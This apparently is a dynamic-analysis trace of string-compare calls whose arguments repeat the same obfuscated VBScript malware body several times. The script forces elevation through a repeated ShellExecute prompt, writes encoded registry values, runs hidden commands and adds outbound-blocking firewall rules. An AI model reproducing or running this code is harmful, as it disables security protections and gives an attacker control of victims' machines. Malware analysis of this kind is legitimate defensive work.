str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.993] wcsncmp (_String1="FBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.993] wcsncmp (_String1="BEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0222.993] wcsncmp (_String1="EUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.994] wcsncmp (_String1="UFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra 